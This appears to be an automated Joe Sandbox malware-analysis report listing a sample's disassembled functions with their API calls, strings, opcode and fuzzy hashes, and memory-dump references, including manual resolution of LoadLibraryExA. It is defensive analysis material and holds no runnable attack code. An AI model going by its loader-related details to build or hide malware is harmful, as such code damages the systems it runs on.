                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                        • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                        • API String ID: 667068680-2233174745
                                                                                                                        • Opcode ID: b9ae89b7a278fbaf73d1998dcdee68f044700f36a7ec262cb54790a6c35d25bd
                                                                                                                        • Instruction ID: 714e52685ae1aa690d30f5ebc4fc330e829f46889672f058611c2175266deaec
                                                                                                                        • Opcode Fuzzy Hash: b9ae89b7a278fbaf73d1998dcdee68f044700f36a7ec262cb54790a6c35d25bd
                                                                                                                        • Instruction Fuzzy Hash: EDF04CE0A8C3D07FBB01BB71AC81826279DE521644B041E95F94355786FEB5DD188FF4
                                                                                                                        Function 02E0579E Relevance: 24.4, APIs: 16, Instructions: 419COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$___from_strstr_to_strchr_wcschr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1963305004-0
                                                                                                                        • Opcode ID: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
                                                                                                                        • Instruction ID: a33908b6d97e2449b27c535f94e029b7f45143e2be5e0ec2e934b91d004ec9e5
                                                                                                                        • Opcode Fuzzy Hash: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
                                                                                                                        • Instruction Fuzzy Hash: 20D11871D40301AFDB25AFA888C066E7BA5FF01328F95917DED49972D0E7319982CFA4
                                                                                                                        Function 02DFC4CD Relevance: 21.3, APIs: 14, Instructions: 296COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                        • Instruction ID: 468e5da9111330e03ed8472a3d2ee65e69d865e56e111b34d5b8a8b15ab1f0ca
                                                                                                                        • Opcode Fuzzy Hash: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                        • Instruction Fuzzy Hash: 50B1AEB19003499EDB60DF68C880BEEBBF5FF08304F15406AEA99A7391D7759C41CB64
                                                                                                                        Function 02E075FD Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 02E07636
                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 02E07641
                                                                                                                          • Part of subcall function 02E06873: _free.LIBCMT ref: 02E06890
                                                                                                                          • Part of subcall function 02E06873: _free.LIBCMT ref: 02E068A2
                                                                                                                          • Part of subcall function 02E06873: _free.LIBCMT ref: 02E068B4
                                                                                                                          • Part of subcall function 02E06873: _free.LIBCMT ref: 02E068C6
                                                                                                                          • Part of subcall function 02E06873: _free.LIBCMT ref: 02E068D8
                                                                                                                          • Part of subcall function 02E06873: _free.LIBCMT ref: 02E068EA
                                                                                                                          • Part of subcall function 02E06873: _free.LIBCMT ref: 02E068FC
                                                                                                                          • Part of subcall function 02E06873: _free.LIBCMT ref: 02E0690E
                                                                                                                          • Part of subcall function 02E06873: _free.LIBCMT ref: 02E06920
                                                                                                                          • Part of subcall function 02E06873: _free.LIBCMT ref: 02E06932
                                                                                                                          • Part of subcall function 02E06873: _free.LIBCMT ref: 02E06944
                                                                                                                          • Part of subcall function 02E06873: _free.LIBCMT ref: 02E06956
                                                                                                                          • Part of subcall function 02E06873: _free.LIBCMT ref: 02E06968
                                                                                                                        • _free.LIBCMT ref: 02E07658
                                                                                                                        • _free.LIBCMT ref: 02E0766D
                                                                                                                        • _free.LIBCMT ref: 02E07678
                                                                                                                        • _free.LIBCMT ref: 02E0769A
                                                                                                                        • _free.LIBCMT ref: 02E076AD
                                                                                                                        • _free.LIBCMT ref: 02E076BB
                                                                                                                        • _free.LIBCMT ref: 02E076C6
                                                                                                                        • _free.LIBCMT ref: 02E076FE
                                                                                                                        • _free.LIBCMT ref: 02E07705
                                                                                                                        • _free.LIBCMT ref: 02E07722
                                                                                                                        • _free.LIBCMT ref: 02E0773A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$___free_lconv_mon
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3658870901-0
                                                                                                                        • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                        • Instruction ID: 7758bf7bab9ea562c49acc079407619f6239e2bb982da43b77d75687d7c40e92
                                                                                                                        • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                        • Instruction Fuzzy Hash: 3D316F315403019FDB71AA78E888B56B3EAEF00394F259419E95AD76E0DF31B882CB64
                                                                                                                        Function 02E06971 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                        • Instruction ID: 5e3b8866b92049c1dd34b0f7809a316d88d6d2e9320d59e1a360aed6a4c5f9d3
                                                                                                                        • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                        • Instruction Fuzzy Hash: 3AC14376E80204ABEB20DBA8CC85FDA77FDEB08704F154165FA04FB2C6D6719D918B64
                                                                                                                        Function 02D32530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02D328CE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Message
                                                                                                                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                        • API String ID: 2030045667-32948583
                                                                                                                        • Opcode ID: 3a20219daa9fb541bce53dc6868035ca93375c4aa0375f199476b8c35581ef22
                                                                                                                        • Instruction ID: f96aea44011199ce606babe6fc64e116e45a62ef995ae737e2b18ae7952f735c
                                                                                                                        • Opcode Fuzzy Hash: 3a20219daa9fb541bce53dc6868035ca93375c4aa0375f199476b8c35581ef22
                                                                                                                        • Instruction Fuzzy Hash: 05A1E531E042948BDB22AA2CCC88BD9B7E5EB09750F1440E5DD499B385CB758E89CF61
                                                                                                                        Function 02DFE35B Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                        • Instruction ID: cfa9c3b534cc8a4d7301dacd6416c2d59e72fded73de4119a61f407d15e32c04
                                                                                                                        • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                        • Instruction Fuzzy Hash: 95115979510208BFCB45EF54D941CDA3BA6EF04350F5281A5FE188F631DA32DE509F95
                                                                                                                        Function 02D3252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • Unexpected Memory Leak, xrefs: 02D328C0
                                                                                                                        • The unexpected small block leaks are:, xrefs: 02D32707
                                                                                                                        • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02D32849
                                                                                                                        • 7, xrefs: 02D326A1
                                                                                                                        • An unexpected memory leak has occurred. , xrefs: 02D32690
                                                                                                                        • bytes: , xrefs: 02D3275D
                                                                                                                        • , xrefs: 02D32814
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                        • API String ID: 0-2723507874
                                                                                                                        • Opcode ID: 5a6a24cb308161dc37a55bbe46d27d4ed41cf5345c4cc23bfba52902118e50a4
                                                                                                                        • Instruction ID: a2293a78c91afdecbbe4238ddb046238c95aefdfe92fec70b19dc69ee3f4179f
                                                                                                                        • Opcode Fuzzy Hash: 5a6a24cb308161dc37a55bbe46d27d4ed41cf5345c4cc23bfba52902118e50a4
                                                                                                                        • Instruction Fuzzy Hash: 0471C270E042A88FDB229A2CCC88BD9BAE5EB09710F1441E5D9499B381DB758EC5CF61
                                                                                                                        Function 02DFB989 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$_abort_memcmp
                                                                                                                        • String ID: C
                                                                                                                        • API String ID: 137591632-1037565863
                                                                                                                        • Opcode ID: 17903f2486249c1948a877ea9dae5677bcd3f5fa43e019d40c9c3c4da5d63b1f
                                                                                                                        • Instruction ID: 2c86b2b7aee7c6259099440b2f443d4fcd1712c4b846fc54e11f3707d9acbffa
                                                                                                                        • Opcode Fuzzy Hash: 17903f2486249c1948a877ea9dae5677bcd3f5fa43e019d40c9c3c4da5d63b1f
                                                                                                                        • Instruction Fuzzy Hash: 52B12975A01219DFDB64DF28C884BADB7B5FB08308F1145AADA49A7350EB31AE90CF54
                                                                                                                        Function 02DC31F7 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 204COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: 6$TCG$BG$BG
                                                                                                                        • API String ID: 176396367-2047151530
                                                                                                                        • Opcode ID: baef1e3796633e3ff9bc607151e15f371de6c66ee75f28aebb7b7bca98e70cfa
                                                                                                                        • Instruction ID: 1155ecde3ac111931631acac1ef0d494b44d3b53bdaf34537b72e7a742f9493b
                                                                                                                        • Opcode Fuzzy Hash: baef1e3796633e3ff9bc607151e15f371de6c66ee75f28aebb7b7bca98e70cfa
                                                                                                                        • Instruction Fuzzy Hash: 6B518020208381ABD646B774AC74BFE669ADF80710F60846DF68B873D1DF19DD058E7A
                                                                                                                        Function 02D3BDC0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetThreadLocale.KERNEL32(00000000,02D3C08B,?,?,00000000,00000000), ref: 02D3BDF6
                                                                                                                          • Part of subcall function 02D3A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02D3A7E2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Locale$InfoThread
                                                                                                                        • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                        • API String ID: 4232894706-2493093252
                                                                                                                        • Opcode ID: 0f06eeaf0f4aea1d0c802230b9a435d60cd6d05b8e28381e78e1a30dd3afd48d
                                                                                                                        • Instruction ID: dfef66d018f500eb421527b733830a90a188fa415c058d316d08cfb63e9b8bdd
                                                                                                                        • Opcode Fuzzy Hash: 0f06eeaf0f4aea1d0c802230b9a435d60cd6d05b8e28381e78e1a30dd3afd48d
                                                                                                                        • Instruction Fuzzy Hash: 45611175B101889BDB03EBA4D8A07DF77BBDB88300F509836A141AB785DA39DD05DFA1
                                                                                                                        Function 02D4AFE0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02D4B000
                                                                                                                        • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02D4B017
                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02D4B0AB
                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000002), ref: 02D4B0B7
                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 02D4B0CB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Read$HandleModule
                                                                                                                        • String ID: KernelBase$LoadLibraryExA
                                                                                                                        • API String ID: 2226866862-113032527
                                                                                                                        • Opcode ID: 65896a68fb6e17c5aada0f8aef2449781cc754840cd3017843c56014e26e4649
                                                                                                                        • Instruction ID: aac1d74e28e938f67a749aedfd4e9160ab60301b4dfee79eca2df035f3557223
                                                                                                                        • Opcode Fuzzy Hash: 65896a68fb6e17c5aada0f8aef2449781cc754840cd3017843c56014e26e4649
                                                                                                                        • Instruction Fuzzy Hash: 05315071A40705BBEB20DB68CC85F6977A8EF16369F104551EA64EB3C1DB70ED40CBA4
                                                                                                                        Function 02D3435C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D34423,?,?,02DB67C8,?,?,02D5E7A8,02D365B1,02D5D30D), ref: 02D34395
                                                                                                                        • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D34423,?,?,02DB67C8,?,?,02D5E7A8,02D365B1,02D5D30D), ref: 02D3439B
                                                                                                                        • GetStdHandle.KERNEL32(000000F5,02D343E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D34423,?,?,02DB67C8), ref: 02D343B0
                                                                                                                        • WriteFile.KERNEL32(00000000,000000F5,02D343E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02D34423,?,?), ref: 02D343B6
                                                                                                                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02D343D4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileHandleWrite$Message
                                                                                                                        • String ID: Error$Runtime error at 00000000
                                                                                                                        • API String ID: 1570097196-2970929446
                                                                                                                        • Opcode ID: 5c1450c4769e7cf4d9650a341fdbac4cbb0755ded165b39cb45bca61eee00327
                                                                                                                        • Instruction ID: ff7de6322acb05da6a7fae33b43b68c7e1483d2a8ce887bbf06964d951636a2d
                                                                                                                        • Opcode Fuzzy Hash: 5c1450c4769e7cf4d9650a341fdbac4cbb0755ded165b39cb45bca61eee00327
                                                                                                                        • Instruction Fuzzy Hash: A7F06261EC5340F5FA13B6A0FC65F99275C8B45B11F504605B655953C2C7F88CC89B61
                                                                                                                        Function 02E06D96 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
